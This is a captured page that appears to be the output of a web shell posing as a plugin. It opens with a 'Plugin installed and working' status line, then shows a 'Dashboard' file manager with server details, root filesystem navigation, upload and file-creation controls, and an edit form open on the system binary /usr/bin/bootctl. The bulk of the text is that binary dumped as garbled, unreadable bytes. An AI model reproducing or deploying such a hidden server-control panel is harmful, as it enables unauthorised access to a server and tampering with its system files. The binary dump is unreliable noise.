{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-22 03:04:18"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Fbin">bin</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Fbin" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: bootctl</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/bin/bootctl">
                    <textarea name="edit_content">ELF          &gt;    �e      @       (�         @ 8  @          @       @       @       �      �                                                                                        X:      X:                    @       @       @      	�      	�                                     r]      r]                   �q     �q     �q           �                   �x     �x     �x                                8      8      8      0       0                    h      h      h      D       D              S�td   8      8      8      0       0              P�td    S      S      S     �      �             Q�td                                                  R�td   �q     �q     �q                        /lib64/ld-linux-x86-64.so.2               GNU   �          � �                   GNU ���&gt;�e�jŸ����涩         GNU                      �         �   �   �   �   ��^�Pv��bA����t�^3�                            �                     o                     �                      g                                           �                     �                     W                     �	                     		                     �	                     �                     �                     �                     U                     �                     
                     o                     �                     �                      F   &quot;                   �                     �                     i                     �                     �                                          	                     4	                     S	                     �                     �	                     P                     �                     �                     �                                           Q                     X                     �                                          �                                          |                     �                                           �                     �                     U                      �                     #                     �                     �                     �	                     �                                          �                     �                     �                                          B                     H                     �                     �                     �                     @                     �                      �                     _                     &lt;                     �                     �                      �                     3                                          �                     �                     �                      (                     �                     �                     q                     �                     �                     x                     �                     �                     �                     ~                     �                     �                     ]                     T                     �                     �                     �                     �                      G	                     �                                          �                     �                     �                     D                     )                                          �                     �	                     �                     �                                          w                     L                     �                     �                     �                     �                     c                     �                     �                     4                     z                     .                     6                     �                     �	                                                               �                     I                     h                     +                     �                     �                     �                     u	                                            

                     .                     �                     �                     &amp;                     �                     p                      *                     �                     �                     �                      �                     $                     �                     m	                                            �                                          ,                       d                     @                     �	                     m                                                               �                     �                                          w                      �     �            l    0�            N  !  0�            f	     �            �    (�            �	    8�             _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable __cxa_finalize __libc_start_main free_and_strdup log_oom_internal unlink_noerrno __errno_location umount_recursive rmdir find_esp_and_warn log_get_max_level log_internal __stack_chk_fail find_xbootldr_and_warn read_one_line_file sd_id128_get_machine parse_env_file_sentinel sd_id128_from_string sd_id128_to_string log_assert_failed _parse_os_release utf8_is_valid_n string_is_safe strcmp path_is_temporary_fs boot_config_load boot_config_select_special_entries efi_loader_get_entries strv_free boot_config_augment_from_loader path_extend_internal mkdir get_color_mode special_glyph stpcpy __printf_chk efi_get_boot_options efi_get_boot_option strcasecmp memcpy unlink safe_fclose fopen_tmpfile_linkable fwrite __fprintf_chk flink_tmpfile terminal_urlify_man underline_enabled program_invocation_short_name __progname efi_get_variable_string dir_is_empty_at string_replace_char putchar puts geteuid boot_config_free pager_open show_boot_entries safe_close open_mkdir_at crypto_random_bytes sha256_init_ctx sha256_process_bytes openat64 sha256_finish_ctx tempfn_random loop_write unlinkat fsync renameat syncfs is_efi_boot getenv_bool efi_get_variable umask efi_set_variable syncfs_path utf8_to_utf16 char16_strlen __snprintf_chk parse_time detect_container log_assert_failed_unreachable efi_set_variable_string systemd_efi_options_variable systemd_efi_options_efivarfs_if_newer parse_boolean efi_set_reboot_to_firmware efi_get_reboot_to_firmware fread fseek malloc fopen64 fmemopen os_release_pretty_name fstat64 stat_verify_regular mmap64 memmem munmap strndup chase_symlinks_and_opendir closedir readdir_ensure_type __asprintf_chk hidden_or_backup_file endswith_no_case startswith_no_case dirfd show_boot_entry efi_loader_get_features efi_stub_get_features efi_loader_get_device_part_uuid efi_get_secure_boot_mode secure_boot_mode_to_string tpm2_support efi_get_boot_order copy_bytes_full copy_times fsync_full strcspn strspn strverscmp_improved lseek64 strncmp chase_symlinks startswith strcpy strrchr ascii_strupper strjoin_real faccessat write_string_file_ts chase_symlinks_and_access efi_add_boot_option reallocarray efi_set_boot_order memmove rm_rf efi_remove_boot_option saved_argv saved_argc log_parse_environment log_open getopt_long loop_device_unref ask_password_agent_close polkit_agent_close pager_close mac_selinux_finish optarg cescape parse_path_argument version mount_image_privately_interactively dispatch_verb parse_json_argument sd_notifyf optind strv_find parse_boolean_argument _Unwind_Resume __gcc_personality_v0 libsystemd-shared-252.so libgcc_s.so.1 libc.so.6 GCC_3.0 GCC_3.3.1 SD_SHARED GLIBC_2.22 GLIBC_2.33 GLIBC_2.26 GLIBC_2.8 GLIBC_2.34 GLIBC_2.4 GLIBC_2.14 GLIBC_2.2.5 GLIBC_2.3.4 /usr/lib64/systemd                                                                                                 	     
                                                                                   G
     0   P&amp;y   _
     a_&amp;	   g
        .
         41|   q
       	 U
         ���   {
     ���   �
     ���  
 �
     ii  	 �
     ���   �
     ii   �
     ���   �
     ui	   �
     ti	   �
      �q            pf      �q            0f       r             r      r            �     @r            �     `r            �     �r            �     �r            �     �r            s     �r            �      s            �      s            �     @s            �     `s            �     �s            �     �s            �     �s            �     �s                  t            
      t                 @t            �     `t            9     �t            &gt;     �t            P     �t            �     �t            `�       u            G     u            `�       u            !     8u            ��      @u            S     Xu            ��      `u            Z     xu            p     �u            a     �u            А      �u            l     �u            ��      �u            |     �u            `�      �u            N     �u            `�       v            �     v            �       v            �     8v            �      @v            �     Xv            �      `v            �     xv            �      �v                 �v            `�      �v            �     �v            p�      �v            �     �v            `�       w                 w            �     w            �     w            �     @w            �     Hw            }     Pw            �     Xw                 �w            �     �w            pK     �w            �K     �w            �K     �w             L     �w            �     �w            �     x            �     x            �     (x                 8x            (L     Hx             L     Xx            +     hx            HL     xx            @     �x            hL      �            @�     (�            �g      @�            P�     H�            `g      `�            ��     h�            @g      ��            x�     ��             g      ��            p�     ��             g      ��            ��     Ȁ            �f      �            ��     �            �f      �                   �        1           �        �           �        �           �        �           �                    �        �            �        �           (�        �           0�        �           8�        �           �z                   �z                   �z                   �z                   �z                   �z                   �z                    {                   {        	           {        
           {                    {                   ({                   0{                   8{                   @{                   H{                   P{                   X{                   `{                   h{                   p{                   x{                   �{                   �{                   �{                   �{                   �{                   �{                   �{                   �{                    �{        !           �{        &quot;           �{        #           �{        $           �{        %           �{        &amp;           �{        &#039;           �{        (            |        )           |        *           |        +           |        ,            |        -           (|        .           0|        /           8|        0           @|        2           H|        3           P|        4           X|        5           `|        6           h|        7           p|        8           x|        9           �|        :           �|        ;           �|        &lt;           �|        =           �|        &gt;           �|        ?           �|        @           �|        A           �|        B           �|        C           �|        D           �|        E           �|        F           �|        G           �|        H           �|        I            }        J           }        K           }        L           }        M            }        N           (}        O           0}        P           8}        Q           @}        R           H}        S           P}        T           X}        U           `}        V           h}        W           p}        X           x}        Y           �}        Z           �}        [           �}        \           �}        ]           �}        ^           �}        _           �}        `           �}        a           �}        b           �}        c           �}        d           �}        e           �}        f           �}        g           �}        h           �}        i            ~        j           ~        k           ~        l           ~        m            ~        n           (~        o           0~        p           8~        q           @~        r           H~        s           P~        t           X~        u           `~        v           h~        w           p~        x           x~        y           �~        z           �~        {           �~        |           �~        }           �~        ~           �~                   �~        �           �~        �           �~        �           �~        �           �~        �           �~        �           �~        �           �~        �           �~        �           �~        �                    �                   �                   �                   �                    �           (        �           0        �           8        �           @        �           H        �           P        �           X        �           `        �           h        �           p        �           x        �           �        �           �        �           �        �           �        �           �        �           �        �           �        �           �        �           �        �           �        �                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   ��H��H��? H��t��H���     �5�: �%�:  ��h    �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h	   ��Q������h
   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h   �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h   ��Q������h   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h    �������h!   ��������h&quot;   �������h#   �������h$   �������h%   �������h&amp;   �������h&#039;   ��q������h(   ��a������h)   ��Q������h*   ��A������h+   ��1������h,   ��!������h-   ��������h.   ��������h/   ������h0   �������h1   ��������h2   �������h3   �������h4   �������h5   �������h6   �������h7   ��q������h8   ��a������h9   ��Q������h:   ��A������h;   ��1������h&lt;   ��!������h=   ��������h&gt;   ��������h?   ������h@   �������hA   ��������hB   �������hC   �������hD   �������hE   �������hF   �������hG   ��q������hH   ��a������hI   ��Q������hJ   ��A������hK   ��1������hL   ��!������hM   ��������hN   ��������hO   ������hP   �������hQ   ��������hR   �������hS   �������hT   �������hU   �������hV   �������hW   ��q������hX   ��a������hY   ��Q������hZ   ��A������h[   ��1������h\   ��!������h]   ��������h^   ��������h_   ������h`   �������ha   ��������hb   �������hc   �������hd   �������he   �������hf   �������hg   ��q������hh   ��a������hi   ��Q������hj   ��A������hk   ��1������hl   ��!������hm   ��������hn   ��������ho   ������hp   �������hq   ��������hr   �������hs   �������ht   �������hu   �������hv   �������hw   ��q������hx   ��a������hy   ��Q������hz   ��A������h{   ��1������h|   ��!������h}   ��������h~   ��������h   ������h�   �������h�   ��������h�   �������h�   �������h�   �������h�   �������h�   �������h�   ��q������h�   ��a������h�   ��Q������h�   ��A������h�   ��1������h�   ��!������h�   ��������h�   ��������h�   ������h�   �������h�   ��������h�   �������h�   �������h�   �������h�   �������h�   �������h�   ��q������h�   ��a������h�   ��Q������h�   ��A������h�   ��1������h�   ��!������h�   ��������h�   ��������h�   ������h�   ��������%}0 D  ���%u0 D  ���%m0 D  ���%e0 D  ���%]0 D  ���%U0 D  ���%M0 D  ���%E0 D  ���%=0 D  ���%50 D  ���%-0 D  ���%%0 D  ���%0 D  ���%0 D  ���%0 D  ���%0 D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%�/ D  ���%}/ D  ���%u/ D  ���%m/ D  ���%e/ D  ���%]/ D  ���%U/ D  ���%M/ D  ���%E/ D  ���%=/ D  ���%5/ D  ���%-/ D  ���%%/ D  ���%/ D  ���%/ D  ���%/ D  ���%/ D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%�. D  ���%}. D  ���%u. D  ���%m. D  ���%e. D  ���%]. D  ���%U. D  ���%M. D  ���%E. D  ���%=. D  ���%5. D  ���%-. D  ���%%. D  ���%. D  ���%. D  ���%. D  ���%. D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%�- D  ���%}- D  ���%u- D  ���%m- D  ���%e- D  ���%]- D  ���%U- D  ���%M- D  ���%E- D  ���%=- D  ���%5- D  ���%-- D  ���%%- D  ���%- D  ���%- D  ���%- D  ���%- D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%�, D  ���%}, D  ���%u, D  ���%m, D  ���%e, D  ���%], D  ���%U, D  ���%M, D  ���%E, D  ���%=, D  ���%5, D  ���%-, D  ���%%, D  ���%, D  ���%, D  ���%, D  ���%, D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%�+ D  ���%}+ D  E��y�F���D�#�H�}�����H���0���H�}�����H�}����H�}����H������H�}����H�����H�}�����H�}�����H�����H�}����H������H�}����H�����H�&lt;$H��t�&quot;���H�����1�H�����L�����H�|$8�n���H�|$0�d���H���|������I���	H�}����L���a  L���Y���H�}��0���H���H���L��� ���L���8���H�}�����H�}�����H������H�����L������ǅ��������A�����A�����H����������D��Hǅ����    ���D��������������H�������  ��L�������A������A������A������A�����A��������H�����H���A������q���A������f���A������[���A������P���A������E���A�����A������4���ǅ��������A�����A���������A�����A���������A��������H�}�����H�����H�}����H�}����H������E1�L��H��X������H��X������1�H�}����H���)���L�����1�H���g���L������1���1���1���1���1���E1�H�}��?���H�}�H�E�    �.���L��H�E�    ����H�}�I������H�}��	���H�}�� ���H�}����H��x������L������Hǅx���    ����H����E������}����H�}����H�}����H�}�H�E�    H��t����H������E�������E��������H���E1�L���h���H�����\���H�����P���H����D���H�������8���H�� ����,���H���D���H�� �������H���0���H��������L������H�� �����H���������H�����D�}�H�}������}�H�E�    ���D�����H�������E�������D�}�D���  �������H�����E�����A���H�}��s���H�}��j����E1�L��H�E��Y���L���Q���H�}��H���H�}��?���H�}��V���E1�E1���E1���E1�E1��H�}�����L���E1��E1��E1��E1�E1��E1��H�}����H�}�H�E�    H��t����L�������I���E1�H�]�L�����H�}��^���H����  ��h�����  ����L�������I����H�}��{���L�����A��H�}��f���D���^�H�}��U���H�}�H�E�    H��t�o���H���W���A������H����A���H��x�������L���.���f.�     @ ��UH��AWAVAUATSH��   ��\���dH�%(   H�E�1����g  H�I��H���X  �8 �O  ��\���H�5&amp;&amp; Hǅp���    �=&amp; Hǅx���    ���0������~��$  L�5	 L�-%�  H��  ��\���E1�L��L��L��������  =  �+	  =�   ~-  ����  Hc�H�&gt;��f���p��  ~��q�$  �&amp; � ��?�7  A���H��x���H��t�   H��x���H��p���H��t��E����  �
����P���H�,$ H���  H�����   H��$ H��H��I��H9�r+��   D  H�{�SH�C H�����   H��L9���   ���tك��B  H�CH�SH��@��H����@8���  H��t�H�8H��t!H�CH���E  H�2��H�CH�     H�SH�    � ��x��  �=�$  ��  ��$ �[���fD  ��h��  1�1�1��|-  E1����E��yA�   H�E�dH+%(   �  H�e�D��[A\A]A^A_]�H���  �V
  H�5�  H�=��  ��L�=�# M��t
A�? ��  L���&#039;���H��I��������  H�۹�  H�Z�  APHEþ  @�   L�}�  L�N�  PH�|�  1���^A��_��xA�����L���������|# �T���H�5H# H�=�# �����9���H���  �  �   H�5�  �7����qH�=# H�# �   �m�A�ǅ�������l���H�=�&quot; H�# 1��H���L�=�&quot; H�5��  L��� ����  ��!    ����d�A�ǅ�����H�=�&quot; H��tMH�=�&quot;  ��  H��p���H��x����   ����H��x���A�ǅ������0�H��&quot; H���  ��\���1�H�� L���y�A������R&quot; ������   �����@&quot; ����L�=�! H�5պ  L���G����  �5&quot; ��������L�=�! H�5��  L�������  H�5��  L�������  H�5��  L��������  H�5�  L�����H��H���  H�=�! �D     �  �Q���H�=G! H�5$  ��A�ǅ��5������L�������L���H��L����H���7���L���^�H��P���H=�   ��  L��H�=! �&lt;  �����=!  ��  � ! ����H�5�  H�=0! ���������H�d�  �  �   H�5��  ������D��H�5Ϲ  1�1����l��&#039;��2��m��8�H�I H������H�������H�  H��H��I��H9��D������H���  �}   H�5T�  H�=e�  ���H�5ѱ  L���P����  H�5̸  L���9����[  ��    ����H�3  H���  Hc� M�,�M��tjH�¸  H�}�L��H�E�    H�E�H���  H�E�H�w�  H�E�H���  H�E�H���  H�E�H���  H�E�H�1�  H�E����H����  H�=a H����  H���������L���  L���  ��  ���w���H���  �  @�   1���A�ǅ��Z���A������O�����     ����H�= ��    ��H��     ���H�=�  �����=n �   1�����D�L���  L�.�  �D  �������U���H�$�  ��   H�5��  H�=��  ��H��o���L��H�=.�  ���A�ǅ��������o����f ����H�=R ��     �K�H�8     ���H�=, ��    �%�H�     ���H���  �C
  H�5��  H�=�  �f��=w �����H�������K������L�[�  L�,�  ��  �\����%�A���������QL���  L���  ��  AUH�&#039;�  �  @�   1��8�A��XZE���/������A������������e���h�   L� �  ��  L���  ��P������L�8�  L���  �=  ���$������H�g�  ��  H�=��  ��H�w�  �g   H�=��  ���A������L���  ARL� �  �6  AW�������������L���  AQ�l  L���  AW��H���  �P
  �   H�5�  �%����������H���
��H��E1�L���@�H��x���H��t�  H��x���H��p���H��t�g�H���/���H������H����f.�      ��1�I��^H��H���PTE1�1�H�=��# �f.�     H�=Q H�J H9�tH� H��t	���    ��    H�=! H�5 H)�H��H��?H��H�H�tH�� H��t��fD  ��    ���=  u+UH�=�  H��tH�=� ���d����� ]� ��    ���w����    H�������xH���fD  H�Q�  ��   H�5X�  �   H�����    ��SH��H�?��H�    [��    ��SH��H�?��H�    [��    ��SH��H�?�p�H�    [��    ��SH��H�?�P�H�    [��    ��SH��H�?�0�H�    [��    ��SH��H�?��H�    [��    ��SH��H�?���H�    [��    USH��H�/H��tH��H����H����H�    H��[]ÐATUH��S��D� H��H��t1�H����H���g�H����E��xD�#[1�]A\���H���4�@ ATI��I��@��US��H��H�5e H�=V dH�%(   H�D$1�H��H���t$8AQM��APM����H�� A�ă��tX��x0H�= E1���H�$H�$    H� �M�����   H�D$dH+%(   ��   H��D��[]A\�@ ��uL����~ι�   L���  L���  �����H�!�  �   1��7�A�ą�x�A�������     �-i ����9��u���L�&quot;�  L���  �﹉   H�˦  ������fD  H��H���  1�1�S��   �   L���  L�P�  ��XZ�����W��    ATI��UH��@��SH��I��H��H�5� H�=� dH�%(   H�D$1�H���&quot;����t]A�ą�x/H�=� A�   ��H�$H�$    H�y �����wH�D$dH+%(   ��   H��D��[]A\��    ����~H�=7 �*�H�&#039;     H��tH�    H�C    E1�H��t�H�E     �f�     H��H���  1�1�S��   �   L�߲  L��  ��XZ�U���@ L���  L���  1���   H�:�  ������   �M��R������ UH�=��  H��ATSH�u�H��dH�%(   H�E�1�H�E�    �n��Ã��ty��xkH�M��H�˃�6u
�y4��   ��3��   ��L�%Ƥ  ��~Mj@L���  ��  1�SL���  �   1�H���  ��XH�]�Z�D  �C���fH�]�L�%t�  H����H�E�dH+%(   uyH�e�L��[A\]À{2�u����{ L�%@�  t��c���@ �y L�%&amp;�  t��D���fD  H��L�ű  ��1�j@L���  ��  H��  �   ��Y^�e�������H����f�UH��AVAUL�-� ATL��SH��PdH�%(   H�E�1�������t ���t���t���T  �G�����  H��H�E�L�u�1�j H��I��L���  L��H���  1�H�E�    H�5��  H�E�    ���A��XZA�����  E����  L�e�M��tBA�&lt;$ t;�=j  u�������j  L��L���O��A�ą��\  �������  H�}�H��t	�? ��  ��H�}���E1�L��H��  1�H�5�  1�H�E�    �!�A�ă����  ���]  L�e�M��tA�&lt;$ �	  L�����=6 �z  �* H���  Hc�H�&gt;��D  A���������g  D���%������A��E��xA�����H�E�dH+%(   �z  H�e�D��[A\A]A^]�f.�     H�=	 f�H�U��E� H�5� )E�)E��i�H����   1�PL��  1�L���  H���  �   ���Y^����D  H�}����H�}������f�     ������b  A��D��%������A��H�}�E����   ��H�}��w�����f��������J  A��D��%������H�}�A�ą�y��E�����=I  u�������  �����~3H���u�L��  1�L���  ��   H���  1��   ���AYAZH�=� ����H�E�H�}�H�� ��������    ���H�}��h���f������~1H��L�۰  1�1�ATL�n�  ��   H� �  �   �8��_AXH�=^ �i��H�E�H�N ���f�     H�}��G�����f���   D��   1�L�J�  L���  H���  �����}���f���   D���   1�L���  L���  H���  ���A���w����    �C�����(���H���u�L�l�  1�L�s�  ��   D��   H�=�  �Z��A]A��A^���fD  H�y H��H��t	�8 ��  H�i�  �O  H�5��  H�=�  ����1�L��H�5��  1�1�H�E�    ���A�ą��  H�E�H��H��t	�8 ��  �~�����  H��A���������f�1�L��H�55�  1�1�H�E�    �s�A�ą���  H�E�H��H��t	�8 �#  �����~�L���  L���  1��:  H�+�  �  @�   �&gt;���$���f�     H�u�H�=��  H�E�    �x�A�ą���  �����  �������  A��D��%������H�}�A�ą����������D  H�=� H��H� �&quot;  H�5� f�H�U��E� )E�)E��9�H�=� H�����H�� ���6  H��t	�; ��   ������  A����7���@ H�=i f�H�U��E� H�5^ )E�)E����H����   1��   PL�I�  L�
�  1�H�ߜ  ���A[A\���� L���  ��   1�1�L���  H���  �   �������� H�����H�����H���;���H���p�����+����C�����Z  H�=� D�%� H��H��t4H�50�  �����t$E���[  ��     E1��,���f�     E����   E1������    H�E�H���#  �8 �  H�=C �F��H�E�1���    H�&#039; �*��H� �c���fD  ��   D��   1�L��  L���  H���  ������f.�     L�!�  ��   1�1�L���  H�`�  �   �x��L�e��e����    H�=�  �x  ��    E1��+����     H��L�ݬ  �T  SL�h�  H���  �  @�   1����A��XZ����fD  ��������������H��L��  ��  SL�4�  �f��{����������E  D��   1�L���  L���  H�|�  �������@ �;�����`����7  D��   1�L�L�  L���  H�&lt;�  �Y���?���@ H�=� ���H�E�H�q H������H���V  1��   SL�Ś  L�Q�  1�H��  ���Y^�r���@ H�= H��H �Z  H�5 f�H�U��E� )E�)E��a��H��H�=�
 ��������  �l	     H�}�����B��A������f���1��*  L��  �  @L���  H�@�  �   �X��A�ą������DI��(���H���  ��   �   H�5�  �(��A�ą�� ����.����     �  D��   1�L���  L�3�  H�ʘ  �������H�=��  �&amp;��A�ą���   ��E1�����	 ���L�0�  L���  1��H  H�y�  �  @�   ����r���E1�I��H��  L��H�5�  1�1�H�E�    H�E�    �7��A�ą���   H�E�H����   �8 ��   H�=g	 �j��H�E�H�E�    H�O	 �   H�}��� �C��H�}��:��H�}�����������&quot;  A��A����A�����H�z�  ��   �   H�5|�  ���A�ą������H�}����H�E�H��tk�8 tfH�=� ����H�E�H�E�    H�� �   �W��������sA��A����A��E��xA�����H�}��~��H�}��u��H�}��&quot;�������A�����~�L��  L�N�  1��  H�ޖ  �  @�   ����A��뚹  D��   1�L���  L��  H���  ������D��y  �   1�L�{�  L��  H�{�  ���A���h��;����H�������H��������H��������H��������H�������H������ ATH��H��UH��H��dH�%(   H�L$1�H��tH��tH��tL9��    HD�H��������x9H�J H��tMH�T$dH+%(   �$  1�H��H��@��H��]A\�q���H�T$dH+%(   ��   H��]A\�@ H��H�$    ���A�ă��te��AHă�&amp;tZ��%vP���a   H)�H��vEE��yk�����~@��  D��   1�L��  L���  H��  �0���fD  ��u�������9H�&lt;$H��t����H�\ �����    H�4$1�H���J�����     ��  D��   1�L�b�  L�S�  H���  �����`����H���D��@ UH��H�����H��1�1�H��AUATSH�������  H��H��������x)�����_E1�H�����H�e�D��[A\A]]�fD  �[��D�(A��t�������`E��A��EH�A����A��E�个���DI��fD  H��L� �  1�1�SL�!�  �h  H���  �   ����XZ�m���@ H��L���  D��1�SL���  �f  H���  �   ���YA��^�|�����I���:����I���0���     AVf�AUATA��UH��SH��@dH�%(   H�D$81�@����   )$H��  L�-H�  �D$ �%���   ��LD��u��I�����H�5$�  ��HD�H��H�����L��H�����L��H������H�T$H��H9���   E��H��  I��   H��  H�5�  HD�1����H�D$8dH+%(   ��   H��@[]A\A]A^�f�)D$ H�J�  L�-��  �D$0 �c���   ��LD����I���K��H�5l�  ��HD�H�\$ H���A��L��H���6��L��H���+��H�T$1H��H9��&lt;���H�c�  �   H�5L�  H�=��  ��� H�!�  �#   H�5*�  H�=֤  �y���t��@ AWAVAUATUH��SH��hH�t$H�|$0H�T$ H�L$dH�%(   H�D$X1�H�D$0    �}��H�|$0A�ǅ���   �   H�L�l$8L�d$@1�H�D$L�4 �fD  L��H���|��I9���   H�D$0E1�L��L��1��&lt;H�D$8    ����L�D$8��x�H�D$HH9l$@u�H;D$u�M��t�H�|$ L��L�D$(�&gt;��L�D$(��u�L��A�   ���H�|$0H�t$�f�����H�D$XdH+%(   �|   H��hD��[]A\A]A^A_� H�|$01���    H��H9D$t�G9�t�H�t$E1�f���     A����  tH�D$H�|$0fD�8E1��{���H�|$0A����k���������H��������H������@ UH��AWI��AVAUATI��SH��D�6dH�%(   H�E�1�A��/t�fD  I��A�|$/t�M����   A�? ��   L������L��H������I��H�H�PH��  @ �P  H��H��H��H% �H)�H���H9�tH��   H��$�   H9�u��  H)�H��tH�L� H�\$L��H���H���5��H��H9�w� H��H9�t��/t�A��/t�/H��L��I�UI�����L�������x9���E1�\H�E�dH+%(   �  H�e�D��[A\A]A^A_]��    ����D�(H��A��tWA��&#039;tQ�&lt;������   A���fD  H��L�e�  1�1�AT�   L��  ��  H�-�  �J��_AX�n���f�������&#039;E1��Z���H��  ��  H�5��  H�=��  ���H��H��  D��1�AT��  �   L��  L���  ����XZ�H��D���  1�ATL��  L���  �   H���  ���YD�+^� ����N��ff.�      H��H��t7���  ��xMtH�5��  H��tH���f���fD  1�H���f�     H�)�  ��  H�5�  H�=i�  �����H�	�  ��  H�5��  H�=��  ����AUATUH��SH��H��H�vH����   L�CM����   H�sH���  L�C M���  H�{( ��   H�s(���H�s H��A�����A��E����   H�sH�����H�sH�����H�sH���y���H�3H���n���H��D��[]A\A]��[���A��H�3H���M���E��DI�H��[]D��A\A]��     H�3H��[]A\A]����fD  L������A��H�sH������A��E��xYH�sH�����A��E���\���H�sH������A��E���q���E���H����L�����A���� ���A���fD  E�������     UH��AWAVAUATSH��dH�%(   H�E�1�H����  D�6I��I��A��/t�D  I��A�|$/t�A�? uNL��������	  ����A�   ���*  H�E�dH+%(   ��  H�e�D��[A\A]A^A_]�D  L���(��L��H�����I��H�H�PH��  @ �
